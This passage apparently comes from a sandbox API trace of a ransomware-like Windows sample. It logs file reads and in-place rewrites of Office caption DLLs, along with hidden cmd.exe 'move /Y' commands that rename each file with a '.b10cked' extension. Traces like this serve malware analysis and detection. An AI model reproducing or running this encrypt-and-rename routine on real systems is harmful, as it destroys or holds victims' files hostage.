lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x15c, dwThreadId=0x78c)) returned 1 [0154.851] CloseHandle (hObject=0x110) returned 1 [0154.852] CloseHandle (hObject=0x114) returned 1 [0154.852] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.852] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.852] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0154.852] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.852] ReleaseMutex (hMutex=0xf8) returned 1 [0154.852] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.852] ReleaseMutex (hMutex=0xf8) returned 1 [0154.852] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.852] ReleaseMutex (hMutex=0xf8) returned 1 [0154.852] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.852] ReleaseMutex (hMutex=0xf8) returned 1 [0154.852] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21164148168) returned 1 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7678 [0154.854] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x7b60 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x7b60 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0154.910] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0154.956] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0154.956] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0154.957] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15791, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3db1 [0154.957] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0154.957] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15791, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3db1 [0154.957] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0154.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0154.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0154.961] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x7b60 [0154.961] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0154.961] CloseHandle (hObject=0x114) returned 1 [0154.962] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX") returned 0x3c [0154.963] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0154.963] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xea4, dwThreadId=0xd34)) returned 1 [0154.965] CloseHandle (hObject=0x110) returned 1 [0154.965] CloseHandle (hObject=0x114) returned 1 [0154.965] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.965] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.965] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0154.965] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.965] ReleaseMutex (hMutex=0xf8) returned 1 [0154.965] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.965] ReleaseMutex (hMutex=0xf8) returned 1 [0154.965] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.965] ReleaseMutex (hMutex=0xf8) returned 1 [0154.965] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.965] ReleaseMutex (hMutex=0xf8) returned 1 [0154.965] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0154.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.966] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21175780583) returned 1 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3f678 [0154.970] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3fb60 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3fb60 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0155.097] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0155.755] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0155.789] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x1daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x1daf, lpOverlapped=0x0) returned 1 [0156.034] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.034] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.042] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.042] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x1daf, 